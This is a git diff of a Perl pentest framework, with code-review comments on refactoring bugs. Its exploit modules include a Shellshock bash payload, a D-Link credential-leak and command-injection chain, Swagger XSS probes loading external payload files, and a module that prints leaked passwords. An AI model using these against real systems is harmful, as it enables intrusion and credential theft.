(@run) { 
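Review bot: `new` in Core::Helper now prints the menu itself and returns `1`, while every other module touched by this patch returns its help text to the caller. If the caller prints the return value, as the other modules' help text seems to require, it would show the menu followed by a stray `1`; the caller is not visible here, so that needs checking. Returning the string keeps the contract uniform: replace `print "` with `return "` and drop `return 1;`.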
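Review bot: The line `require "Spellbook/" . $category . "/" . $package -> {module} . ".pm";` in Core::Module builds a file path from two fields of the resources data and loads it with no validation and no error context, now that the `eval`/`croak` wrapper is gone. A load failure surfaces as a bare `Can't locate ...` from inside `new`, and an entry containing a path separator would make `require` load a file outside `Spellbook/`. Check both fields first, e.g. `die "Invalid module entry: $name\n" if "$category$package->{module}" =~ /\W/;`, and wrap the `require` in `eval { ...; 1 } or die "Failed to load module $name: $@";`. The body of `new` continues past the end of this hunk.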
@@ -38,7 +27,7 @@ package Spellbook::Core::Module { return @results; } } - + return "\n[!] Module not found.\n\n"; } } diff --git a/lib/Spellbook/Core/Orchestrator.pm b/lib/Spellbook/Core/Orchestrator.pm index 0c1c112..b4a8a63 100644 --- a/lib/Spellbook/Core/Orchestrator.pm +++ b/lib/Spellbook/Core/Orchestrator.pm @@ -7,13 +7,13 @@ package Spellbook::Core::Orchestrator { use threads::shared; use Spellbook::Helper::Read_File; use List::MoreUtils qw(uniq); - + sub new { my ($self, $parameters) = @_; my ($help, $wordlist, $module, $list, $queue); my $threads = 10; - + Getopt::Long::GetOptionsFromArray ( $parameters, "h|help" => \$help, @@ -34,24 +34,24 @@ package Spellbook::Core::Orchestrator { $queue -> end(); my @results :shared; - + async { while (defined(my $target = $queue -> dequeue())) { my @response = Spellbook::Core::Module -> new ( $module, [ "--target" => $target, @$parameters ] ); - + lock(@results); - + if (@response) { push @results, @response; } } - } - + } + for 1 .. $threads; - while (threads -> list(threads::running) > 0) { + while (threads -> list(threads::running) > 0) { $_ -> join() for threads -> list(threads::all); } @@ -59,16 +59,13 @@ package Spellbook::Core::Orchestrator { } if ($help) { - return<<"EOT"; - -Core::Orchestrator -============== --h, --help See this menu --t, --threads Number of threads --w, --wordlist Wordlist file --e, --entrypoint Module to execute\n\n"; - -EOT + return " + \rCore::Orchestrator + \r============== + \r\t-h, --help See this menu + \r\t-t, --threads Number of threads + \r\t-w, --wordlist Wordlist file + \r\t-e, --entrypoint Module to execute\n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/CORS_Misconfig.pm b/lib/Spellbook/Exploit/CORS_Misconfig.pm index 7dd342c..72fb36c 100644 --- a/lib/Spellbook/Exploit/CORS_Misconfig.pm +++ b/lib/Spellbook/Exploit/CORS_Misconfig.pm 
@@ -14,17 +14,17 @@ package Spellbook::Exploit::CORS_Misconfig { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + my $useragent = Spellbook::Core::UserAgent -> new (); my @payloads = ("*", "null", "https://spellbook.xpl", "$target.spellbook.xpl"); # "test.$target", "http://" foreach my $payload (@payloads) { my $request = $useragent -> get($target, "Origin" => $payload); my $header = $request -> header("access-control-allow-origin"); - + if ($header) { if ($header eq $payload) { push @results, $target; @@ -36,14 +36,11 @@ package Spellbook::Exploit::CORS_Misconfig { } if ($help) { - return<<"EOT"; - -Exploit::CORS_Misconfing -======================= --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rExploit::CORS_Misconfing + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/DataBreach.pm b/lib/Spellbook/Exploit/DataBreach.pm index e68d700..c500fad 100644 --- a/lib/Spellbook/Exploit/DataBreach.pm +++ b/lib/Spellbook/Exploit/DataBreach.pm @@ -4,7 +4,7 @@ package Spellbook::Exploit::DataBreach { use JSON; use Spellbook::Core::UserAgent; use Spellbook::Core::Credentials; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @results); @@ -20,7 +20,7 @@ package Spellbook::Exploit::DataBreach { my $endpoint = "https://haveibeenpwned.com/api/v3/breachedaccount/$target?includeUnverified=true&truncateResponse=false"; my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> get($endpoint, "hibp-api-key" => $credentials); - + if ($request -> code() == 200) { my $data = decode_json($request -> decoded_content()); 
@@ -36,14 +36,11 @@ package Spellbook::Exploit::DataBreach { } if ($help) { - return<<"EOT"; - -Exploit::Databreach -============== --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rExploit::Databreach + \r============== + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } } } diff --git a/lib/Spellbook/Exploit/Django_DEBUG.pm b/lib/Spellbook/Exploit/Django_DEBUG.pm index 9102e89..2949057 100755 --- a/lib/Spellbook/Exploit/Django_DEBUG.pm +++ b/lib/Spellbook/Exploit/Django_DEBUG.pm @@ -1,4 +1,4 @@ -package Spellbook::Exploit::Django_DEBUG { +package Spellbook::Exploit::Django_Debug { use strict; use warnings; use Spellbook::Core::UserAgent; @@ -15,7 +15,7 @@ package Spellbook::Exploit::Django_DEBUG { ); if ($target){ - if ($target !~ /^http(?:s)?:\/\//x){ + if ($target !~ /^http(s)?:\/\//){ $target = "https://$target"; } @@ -32,19 +32,16 @@ package Spellbook::Exploit::Django_DEBUG { } } } - + return @results } if ($help) { - return<<"EOT"; - -Exploit::Django_Debug -======================= --h, --help See this menu --t, --target Define a target"; - -EOT + return " + \rExploit::Django_Debug + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target"; } return 0; diff --git a/lib/Spellbook/Exploit/Fullchain_DLINK.pm b/lib/Spellbook/Exploit/Fullchain_DLINK.pm index f2d49a5..e7d8540 100644 --- a/lib/Spellbook/Exploit/Fullchain_DLINK.pm +++ b/lib/Spellbook/Exploit/Fullchain_DLINK.pm @@ -7,7 +7,7 @@ package Spellbook::Exploit::Fullchain_DLINK { use Spellbook::Recon::Query_Shodan; use Spellbook::Advisory::CVE_2020_9376; use Spellbook::Advisory::CVE_2020_9377; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $payload, @results); 
@@ -20,23 +20,23 @@ package Spellbook::Exploit::Fullchain_DLINK { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $target]); if ($credentials) { - my ($username, $password) = split /:/x, $credentials; + my ($username, $password) = split /:/, $credentials; - if (!$password) { + if (!$password) { $password = "admin"; } if ($username) { my $userAgent = LWP::UserAgent->new(); - my $login_payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; - + my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; + my $headers = HTTP::Headers->new ( "Content-Type" => "application/x-www-form-urlencoded", "Cookie" => "uid=zwUEueUOvi", @@ -48,16 +48,16 @@ package Spellbook::Exploit::Fullchain_DLINK { "Connection" => "keep-alive" ); - my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $login_payload); + my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $payload); my $response = $userAgent -> request($request); - - if ($response -> is_success) { + + if ($response -> is_success) { my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([ "--target" => $target, "--cookie" => "zwUEueUOvi", "--payload" => "uname -a" ]); - + if ($exploit[0] ne "Authenication fail") { push @results, @exploit; } @@ -69,15 +69,12 @@ package Spellbook::Exploit::Fullchain_DLINK { } if ($help) { - return<<"EOT"; - -Exploit::Fullchain_DLINK -======================= --h, --help See this menu --t, --target Define a target --p, --payload Send a command\n\n"; - -EOT + return " + \rExploit::Fullchain_DLINK + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target + \r-p, --payload Send a command\n\n"; } return 0; 
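Review bot: Inside `if ($username)` the line `my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA=";` declares a second `$payload` that hides the one declared at the top of `new` for the `-p, --payload` option. The previous name kept the login form body and the user-supplied option apart. Keep `my $login_payload = ...;` and pass `$login_payload` as the last argument of `HTTP::Request -> new("POST", "$target/session.cgi", $headers, ...)` in the following hunk. The enclosing `new` starts before this hunk.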
diff --git a/lib/Spellbook/Exploit/HAProxy_Exposed.pm b/lib/Spellbook/Exploit/HAProxy_Exposed.pm index 1ccdb33..b40ca6c 100644 --- a/lib/Spellbook/Exploit/HAProxy_Exposed.pm +++ b/lib/Spellbook/Exploit/HAProxy_Exposed.pm @@ -1,7 +1,7 @@ package Spellbook::Exploit::HAProxy_Exposed { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -14,17 +14,14 @@ package Spellbook::Exploit::HAProxy_Exposed { if ($target) { return @result; - } + } if ($help) { - return<<"EOT"; - -Exploit::HAProxy_Exposed -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rExploit::HAProxy_Exposed + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/Headers_Misconfig.pm b/lib/Spellbook/Exploit/Headers_Misconfig.pm index 168352c..fa75e01 100644 --- a/lib/Spellbook/Exploit/Headers_Misconfig.pm +++ b/lib/Spellbook/Exploit/Headers_Misconfig.pm @@ -15,7 +15,7 @@ package Spellbook::Exploit::Headers_Misconfig { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } @@ -35,19 +35,16 @@ package Spellbook::Exploit::Headers_Misconfig { push @results, "$target don't have $header header."; } } - + return @results; } if ($help) { - return<<"EOT"; - -Exploit::Headers_Misconfig -======================= --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rExploit::Headers_Misconfig + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/Mixed_Content.pm b/lib/Spellbook/Exploit/Mixed_Content.pm index 211bfbc..c54967a 100644 --- a/lib/Spellbook/Exploit/Mixed_Content.pm +++ b/lib/Spellbook/Exploit/Mixed_Content.pm 
@@ -2,7 +2,7 @@ package Spellbook::Exploit::Mixed_Content { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result, @urls); @@ -15,18 +15,18 @@ package Spellbook::Exploit::Mixed_Content { if ($target) { if ($target =~ /^http:\/\//x) { - $target =~ s/^http:\/\///x; + $target =~ s/^http:\/\///x; } - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new (); my $request = $userAgent -> get($target); for (($request -> content =~ /src="([^"]+)"/gx) || ($request -> content =~ /href="([^"]+)"/gx)){ - push @urls, $1; + push @urls, $1; } foreach my $url (@urls) { @@ -36,17 +36,15 @@ package Spellbook::Exploit::Mixed_Content { } return @result; - } + } if ($help) { - return<<"EOT"; - -Exploit::Mixed_Content -===================== --h, --help See this menu --t, --target Define a target to perform the analysis\n; - -EOT + return " + \rExploit::Mixed_Content + \r===================== + \r-h, --help See this menu + \r-t, --target Define a target to perform the analysis\n + "; } return 0; diff --git a/lib/Spellbook/Exploit/None_Attack.pm b/lib/Spellbook/Exploit/None_Attack.pm index 4ae6efe..dfc794b 100644 --- a/lib/Spellbook/Exploit/None_Attack.pm +++ b/lib/Spellbook/Exploit/None_Attack.pm @@ -1,8 +1,8 @@ package Spellbook::Exploit::None_Attack { use strict; use warnings; - - sub new { + + sub new { my ($self, $parameters) = @_; my ($help, @result); @@ -13,16 +13,13 @@ package Spellbook::Exploit::None_Attack { if (1) { return @result; - } + } if ($help) { - return<<"EOT"; - -Exploit::None_Attack -===================== --h, --help See this menu\n\n"; - -EOT + return " + \rExploit::None_Attack + \r===================== + \r-h, --help See this menu\n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/Pwn_DB.pm b/lib/Spellbook/Exploit/Pwn_DB.pm index 64fa9a8..a3a976b 100644 
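Review bot: The loop `for ((... =~ /src="([^"]+)"/gx) || (... =~ /href="([^"]+)"/gx))` in Mixed_Content does not collect every URL, because `||` evaluates its left operand in scalar context. A page with any `src` attribute therefore yields a single iteration, only the first `src` value reaches `@urls`, and `href` is consulted only when no `src` matched. The scanner then under-reports mixed content. One list-context match collects both attributes: `push @urls, $request -> content =~ /(?:src|href)="([^"]+)"/gx;`. These lines change only in whitespace in this patch, and the `foreach my $url (@urls)` body lies partly outside the hunk.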
--- a/lib/Spellbook/Exploit/Pwn_DB.pm +++ b/lib/Spellbook/Exploit/Pwn_DB.pm @@ -17,7 +17,7 @@ package Spellbook::Exploit::Pwn_DB { if ($target) { my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> post( - "https://pwndb2am4tzkvold.tor2web.io/", + "https://pwndb2am4tzkvold.tor2web.io/", Content => "luser=&domain=$target&luseropr=0&domainopr=0&submitform=em" ); @@ -29,21 +29,19 @@ package Spellbook::Exploit::Pwn_DB { while ($content =~ /\[luser\] => ([^\n]+)[^\)]+\[password\] => ([^\n]+)/mgx) { if ($1 ne "donate") { print "$1\@$target:$2\n"; - } + } } - } + } } } - + if ($help) { - return<<"EOT"; - -Exploit::Pwn_DB -======================= --h, --help See this menu --t, --target Define a target\n; - -EOT + return " + \rExploit::Pwn_DB + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target\n + "; } return 0; diff --git a/lib/Spellbook/Exploit/Redis_Unauth.pm b/lib/Spellbook/Exploit/Redis_Unauth.pm index a055494..afb0625 100644 --- a/lib/Spellbook/Exploit/Redis_Unauth.pm +++ b/lib/Spellbook/Exploit/Redis_Unauth.pm @@ -3,7 +3,7 @@ package Spellbook::Exploit::Redis_Unauth { use warnings; use Redis; use Try::Tiny; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -21,30 +21,27 @@ package Spellbook::Exploit::Redis_Unauth { try { my $redis = Redis -> new ( - server => $target, + server => $target, name => "Spellbook", cnx_timeout => 45 ); - + my $requirepass = $redis -> config_get ("requirepass") -> [1]; - + if (!defined($requirepass) || $requirepass eq "") { push @result, $target; } }; return @result; - } + } if ($help) { - return<<"EOT"; - -Exploit::Redis_Exposed -===================== --h, --help See this menu --t, --target Set a target to detect misconfigurations\n\n"; - -EOT + return " + \rExploit::Redis_Exposed + \r===================== + \r-h, --help See this menu + \r-t, --target Set a target to detect misconfigurations\n\n"; } return 0; 
diff --git a/lib/Spellbook/Exploit/Reflected_XSS.pm b/lib/Spellbook/Exploit/Reflected_XSS.pm index 2e66736..59beaad 100644 --- a/lib/Spellbook/Exploit/Reflected_XSS.pm +++ b/lib/Spellbook/Exploit/Reflected_XSS.pm @@ -31,7 +31,7 @@ package Spellbook::Exploit::Reflected_XSS { $params -> remove($name); $params -> append($name, $payload); - + $parsed_url -> query($params); try { @@ -47,19 +47,16 @@ package Spellbook::Exploit::Reflected_XSS { } } } - + return @result; } if ($help) { - return<<"EOT"; - -Exploit::Reflected_XSS -===================== --h, --help See this menu --t, --target Set an website to see paths from WayBackMachine\n"; - -EOT + return " + \rExploit::Reflected_XSS + \r===================== + \r-h, --help See this menu + \r-t, --target Set an website to see paths from WayBackMachine\n"; } return 0; diff --git a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm index 60cce59..2a353b1 100644 --- a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm +++ b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm @@ -14,7 +14,7 @@ package Spellbook::Exploit::S3_Bucket_Takeover { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } @@ -29,17 +29,14 @@ package Spellbook::Exploit::S3_Bucket_Takeover { } return @result; - } + } if ($help) { - return<<"EOT"; - -Exploit::S3_Bucket_Takeover -===================== --h, --help See this menu --t, --target Check the possibility to takeover an s3 resource\n"; - -EOT + return " + \rExploit::S3_Bucket_Takeover + \r===================== + \r-h, --help See this menu + \r-t, --target Check the possibility to takeover an s3 resource\n"; } return 0; diff --git a/lib/Spellbook/Exploit/Shellshock.pm b/lib/Spellbook/Exploit/Shellshock.pm index 870e30f..3b2e4a9 100644 --- a/lib/Spellbook/Exploit/Shellshock.pm +++ b/lib/Spellbook/Exploit/Shellshock.pm 
@@ -19,7 +19,7 @@ package Spellbook::Exploit::Shellshock { agent => "() { :; }; echo; echo; /bin/bash -c 'ls'" ); - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } @@ -31,15 +31,12 @@ package Spellbook::Exploit::Shellshock { } if ($help) { - return<<"EOT"; - -Exploit::Shellshock -===================== --h, --help See this menu --t, --target Define a target --c, --command Define a command to delivery\n\n"; - -EOT + return " + \rExploit::Shellshock + \r===================== + \r-h, --help See this menu + \r-t, --target Define a target + \r-c, --command Define a command to delivery\n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/Subdomain_Takeover.pm b/lib/Spellbook/Exploit/Subdomain_Takeover.pm index 43e250e..1b1832a 100644 --- a/lib/Spellbook/Exploit/Subdomain_Takeover.pm +++ b/lib/Spellbook/Exploit/Subdomain_Takeover.pm 
@@ -9,71 +9,65 @@ package Spellbook::Exploit::Subdomain_Takeover { my ($self, $parameters) = @_; my ($help, $target, @results); - my %service_fingerprints = ( - "68934a3e9455fa72420237eb05902327" => "cname.greatpages.com.br", - "1eb970ce5a18bec7165f016df8238566" => "github.github.io", - "387caa8a924c5f92496824494b929207" => "heroku.com", - "595e88012a6521aae3e12cbebe76eb9e" => "pages.rdstation.com.br", - "fdda6b9858b843b34663e01f0bcce558" => "hosting.gitbook.io", - "6e3eb000e6dfd2ee60de7a9c53d33489" => "sslproxy.teamwork.com", - "308be540e2821668fb15c42317b1a256" => "wpengine.com", - "cb4c751c4bd5d73750c59db5621a6faa" => "shops.myshopify.com", - "1d9896e6c6994806305469581db3bf1d" => "proxy-ssl.webflow.com", - "a9de491af0529a118b4d456566c2b34a" => "sites.hubspot.net", - "52822a49f5e0b29181fb66c744ff6b6e" => "wixdns.net", - ); - - Getopt::Long::GetOptionsFromArray( + Getopt::Long::GetOptionsFromArray ( $parameters, "h|help" => \$help, "t|target=s" => \$target ); - if ($help) { - return <<"EOT"; - -Exploit::Subdomain_Takeover_Check -============== --h, --help See this menu --t, --target Define a target - -EOT - } - - return @results unless $target; - - $target =~ s/^http(s)?:\/\///x; - - my $resolv = Net::DNS::Resolver->new(); - my $reply = $resolv->search($target); - - return @results unless $reply; - - $target = "https://$target"; - - foreach my $dns_resource ($reply->answer()) { - next unless $dns_resource->can("cname"); - - my $cname = $dns_resource->cname(); - - while (my ($hash, $service) = each %service_fingerprints) { - next unless $cname =~ m/$service/x; - - my $useragent = Spellbook::Core::UserAgent->new(); - my $response = $useragent->get($target); - - if ($response->code() == 200 || $response->code() == 404) { - my $content_hash = md5_hex($response->content()); - - if ($hash eq $content_hash) { - push @results, $target; - last; + if ($target) { + $target =~ s/^http(s)?:\/\///x; + + my $resolv = Net::DNS::Resolver -> new(); + my $reply = $resolv -> 
search($target); + + if ($reply) { + $target = "https://$target"; + + foreach my $rr ($reply -> answer()) { + if ($rr -> can("cname")) { + my %hashes = ( + "68934a3e9455fa72420237eb05902327" => "cname.greatpages.com.br", + "1eb970ce5a18bec7165f016df8238566" => "github.github.io", + "387caa8a924c5f92496824494b929207" => "heroku.com", + "595e88012a6521aae3e12cbebe76eb9e" => "pages.rdstation.com.br", + "fdda6b9858b843b34663e01f0bcce558" => "hosting.gitbook.io", + "6e3eb000e6dfd2ee60de7a9c53d33489" => "sslproxy.teamwork.com", + "308be540e2821668fb15c42317b1a256" => "wpengine.com", + "cb4c751c4bd5d73750c59db5621a6faa" => "shops.myshopify.com", + "1d9896e6c6994806305469581db3bf1d" => "proxy-ssl.webflow.com", + "a9de491af0529a118b4d456566c2b34a" => "sites.hubspot.net", + "52822a49f5e0b29181fb66c744ff6b6e" => "wixdns.net", + # "9043fb5164b8a1a5fea8031025fe9ef8" => "firebase", + # "648e671c67c7aee4eae2918e7cfbf5e4" => "squarespace.com" + ); + + foreach (%hashes) { + if ($rr -> cname() =~ m/$_/x) { + my $useragent = Spellbook::Core::UserAgent -> new(); + my $request = $useragent -> get($target); + + if ($request -> code() == 200 || $request -> code() == 404) { + my $md5 = md5_hex($request -> content()); + + return @results, $target if $hashes{$md5}; + } + } + } } } } + + return @results; } - return @results; + if ($help) { + return " + \rExploit::Subdomain_Takeover_Check + \r============== + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; + } } } diff --git a/lib/Spellbook/Exploit/Swagger_XSS.pm b/lib/Spellbook/Exploit/Swagger_XSS.pm index 4972d0c..4fd032c 100644 --- a/lib/Spellbook/Exploit/Swagger_XSS.pm +++ b/lib/Spellbook/Exploit/Swagger_XSS.pm 
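Review bot: The fingerprint check in Subdomain_Takeover can report a target for the wrong reason. `foreach (%hashes)` walks keys and values alike, the service name is interpolated into `m/$_/x` unescaped, and `return @results, $target if $hashes{$md5};` accepts a body matching any provider's fingerprint rather than the one whose CNAME matched. Tie the two together with `foreach my $hash (keys %hashes) {`, `if ($rr -> cname() =~ m/\Q$hashes{$hash}\E/x) {` and `return @results, $target if $md5 eq $hash;`. The sub also lost its trailing `return`, so a call with neither `--target` nor `--help` now returns whatever the final `if ($help)` test evaluated to; end it with `return 0;` as the sibling modules do.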
@@ -1,67 +1,71 @@ package Spellbook::Exploit::Swagger_XSS { - use strict; use warnings; use Spellbook::Core::UserAgent; sub new { my ($self, $parameters) = @_; - my ($help, $target, @vulnerable_endpoints); + my ($help, $target, @result); - Getopt::Long::GetOptionsFromArray( + Getopt::Long::GetOptionsFromArray ( $parameters, "h|help" => \$help, "t|target=s" => \$target ); - if ($help) { - return <<"EOT"; -Exploit::Swagger_XSS -===================== --h, --help See this menu --t, --target Set a target - -EOT - } - - return 0 unless $target; - - $target = "https://$target" unless $target =~ /^http(?:s)?:\/\//x; - $target =~ s/\/$//x; - - my $useragent = Spellbook::Core::UserAgent->new(); - - my @paths = ( - "/swagger", "/swagger-ui", "/swagger.json", "/v2/api-docs", "/api-docs", - "/api/swagger", "/api/swagger-ui", "/api/swagger.json", "/api/v2/api-docs", - "/api/api-docs", "/docs/swagger", "/docs/swagger-ui", "/docs/swagger.json", - "/docs/v2/api-docs", "/docs/api-docs", "/swagger-ui.html", "/api/swagger-ui.html", - "/api/v1/swagger-ui.html", "/v1/swagger-ui.html", "/api/v2/swagger-ui.html", - "/v2/swagger-ui.html", "/api/v3/swagger-ui.html", "/v3/swagger-ui.html" - ); - - my @payloads = ( - "?url=https://gist.githubusercontent.com/htrgouvea/df8a1a495c96c9942adc003884bc6b30/raw/92202a78d99d6c284b675ed34cf882895d75dfb4/payload-swagger-ui.yml", - "?configUrl=https://gist.githubusercontent.com/htrgouvea/86e17124610e7550295533e9d7bac571/raw/cf690c6862d38e02a081a9d580510ba8fff28bef/payload-swagger-ui.json" - ); - - foreach my $path (@paths) { - my $base_url = "$target$path"; - my $initial_response = $useragent->get($base_url); - - next unless $initial_response->code() == 200; - next unless $initial_response->content() =~ /<title>(.*)<\/title>/x; - next unless $1 =~ /Swagger UI/; - - foreach my $payload (@payloads) { - my $test_url = $base_url . 
$payload; - my $test_response = $useragent->get($test_url); + if ($target) { + if ($target !~ /^http(s)?:\/\//x) { + $target = "https://$target"; + } - push @vulnerable_endpoints, $test_url if $test_response->code() == 200; + $target =~ s/\/$//x; + my $useragent = Spellbook::Core::UserAgent -> new(); + + my @paths = ( + "/swagger", "/swagger-ui", "/swagger.json", "/v2/api-docs", "/api-docs", "/api/swagger", "/api/swagger-ui", "/api/swagger.json", + "/api/v2/api-docs", "/api/api-docs", "/docs/swagger", "/docs/swagger-ui", "/docs/swagger.json", "/docs/v2/api-docs", + "/docs/api-docs", "/swagger-ui.html", "/api/swagger-ui.html", "/api/v1/swagger-ui.html", "/v1/swagger-ui.html", + "/api/v2/swagger-ui.html", "/v2/swagger-ui.html", "/api/v3/swagger-ui.html", "/v3/swagger-ui.html" + ); + + foreach my $path (@paths) { + my $request = $useragent -> get("$target$path"); + + if ($request -> code() == 200) { + if ($request -> content() =~ /<title>(.*)<\/title>/x) { + my $title = $1; + + if ($title =~ /Swagger UI/x) { + my @payloads = ( + "?url=https://gist.githubusercontent.com/htrgouvea/df8a1a495c96c9942adc003884bc6b30/raw/92202a78d99d6c284b675ed34cf882895d75dfb4/payload-swagger-ui.yml", + "?configUrl=https://gist.githubusercontent.com/htrgouvea/86e17124610e7550295533e9d7bac571/raw/cf690c6862d38e02a081a9d580510ba8fff28bef/payload-swagger-ui.json" + ); + + foreach my $payload (@payloads) { + my $endpoint = $target . $path . $payload; + my $request = $useragent -> get($endpoint); + + if ($request -> code() == 200) { + push @result, $endpoint; + } + } + } + } + } } + + return @result; } - return @vulnerable_endpoints; + if ($help) { + return " + \rExploit::Swagger_XSS + \r===================== + \r-h, --help See this menu + \r-t, --target Set a target\n\n"; + } + + return 0; } } diff --git a/lib/Spellbook/Exploit/Upload_Via_PUT.pm b/lib/Spellbook/Exploit/Upload_Via_PUT.pm index 6829372..53a4f67 100644 --- a/lib/Spellbook/Exploit/Upload_Via_PUT.pm 
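Review bot: `use strict;` is removed from Spellbook::Exploit::Swagger_XSS, while the other modules whose preamble is visible in this patch keep it. The rewritten body declares a second `my $request` inside the payload loop and relies on `$1`; a mistyped variable there would now become a silent package global instead of a compile error. Put `use strict;` back above `use warnings;`.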
+++ b/lib/Spellbook/Exploit/Upload_Via_PUT.pm @@ -15,7 +15,7 @@ package Spellbook::Exploit::Upload_Via_PUT { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } @@ -32,14 +32,11 @@ package Spellbook::Exploit::Upload_Via_PUT { } if ($help) { - return<<"EOT"; - -Recon::Explioit -===================== --h, --help See this menu --t, --target Define\n\n"; - -EOT + return " + \rRecon::Explioit + \r===================== + \r-h, --help See this menu + \r-t, --target Define\n\n"; } return 0; diff --git a/lib/Spellbook/Helper/CDN_Checker.pm b/lib/Spellbook/Helper/CDN_Checker.pm index caa1bd5..686884c 100644 --- a/lib/Spellbook/Helper/CDN_Checker.pm +++ b/lib/Spellbook/Helper/CDN_Checker.pm 
@@ -7,52 +7,54 @@ package Spellbook::Helper::CDN_Checker { use Spellbook::Recon::Get_IP; sub new { - my ($self, $parameters) = @_; - my ($help, $target, @result); + my ($self, $parameters) = @_; + my ($help, $target, @result); - Getopt::Long::GetOptionsFromArray ( - $parameters, - "h|help" => \$help, - "t|target=s" => \$target - ); - - return <<"EOT" if $help; - -Helper::CDN_Checker -===================== --h, --help See this menu --t --target Define a target\n\n"; - -EOT - - return 0 unless $target; + Getopt::Long::GetOptionsFromArray ( + $parameters, + "h|help" => \$help, + "t|target=s" => \$target + ); + if ($target) { my $ip = Spellbook::Recon::Get_IP -> new (["--target" => $target]); - return 0 unless $ip; - - my $cnd_list = "https://raw.githubusercontent.com/projectdiscovery/cdncheck/main/cmd/generate-index/sources_data.json"; - my $useragent = Spellbook::Core::UserAgent -> new (); - my $request = $useragent -> get($cnd_list); - - return 0 unless $request->code == 200; - my $data = decode_json($request -> content); - my $content = $data -> {"cdn"}; # we have others options - - my $target_ip = Net::IP->new($ip); - - for my $provider (keys %{$content}) { - for my $range (@{$content->{$provider}}) { - my $cdn_range = Net::IP->new($range); - if ($cdn_range->overlaps($target_ip)) { - push @result, $target; - return @result; + if ($ip) { + my $cnd_list = "https://raw.githubusercontent.com/projectdiscovery/cdncheck/main/cmd/generate-index/sources_data.json"; + my $useragent = Spellbook::Core::UserAgent -> new (); + my $request = $useragent -> get($cnd_list); + + if ($request -> code == 200) { + my $data = decode_json($request -> content); + my $content = $data -> {"cdn"}; # we have others options + + for (keys %{$content}) { + for (@{$content -> {$_}}) { + my $range = Net::IP -> new($_); + my $value = Net::IP -> new($ip); + my $match = $range -> overlaps($value); + + if ($match) { + push @result, $target; + } + } } } } return @result; } + + if ($help) { + return " + 
\rHelper::CDN_Checker + \r===================== + \r-h, --help See this menu + \r-t --target Define a target\n\n"; + } + + return 0; + } } 1; \ No newline at end of file diff --git a/lib/Spellbook/Helper/Exifs_Write.pm b/lib/Spellbook/Helper/Exifs_Write.pm index efe40a5..ea7fb0b 100755 --- a/lib/Spellbook/Helper/Exifs_Write.pm +++ b/lib/Spellbook/Helper/Exifs_Write.pm @@ -44,15 +44,12 @@ package Spellbook::Helper::Exifs_Write { } if ($help) { - return<<"EOT"; - -Helper::Exifs_Write -===================== --h, --help See this menu --f, --file Define a file write the payload --p --payload Set a payload to write into file\n\n"; - -EOT + return " + \rHelper::Exifs_Write + \r===================== + \r-h, --help See this menu + \r-f, --file Define a file write the payload + \r-p --payload Set a payload to write into file\n\n"; } return 0; diff --git a/lib/Spellbook/Helper/Generate_UUID.pm b/lib/Spellbook/Helper/Generate_UUID.pm index e80b5c6..eeb9157 100644 --- a/lib/Spellbook/Helper/Generate_UUID.pm +++ b/lib/Spellbook/Helper/Generate_UUID.pm @@ -19,23 +19,20 @@ package Spellbook::Helper::Generate_UUID { if ($version) { for (my $i = 1; $i <= $repeat; $i++) { my $generate = create_uuid_as_string($version); - + push @result, $generate; } - + return @result; } if ($help) { - return<<"EOT"; - -Helper::Generate_UUID -===================== --h, --help See this menu --v, --version Version of UUID algorithm --r, --repeat Quantities of repetitions\n\n"; - -EOT + return " + \rHelper::Generate_UUID + \r===================== + \r-h, --help See this menu + \r-v, --version Version of UUID algorithm + \r-r, --repeat Quantities of repetitions\n\n"; } 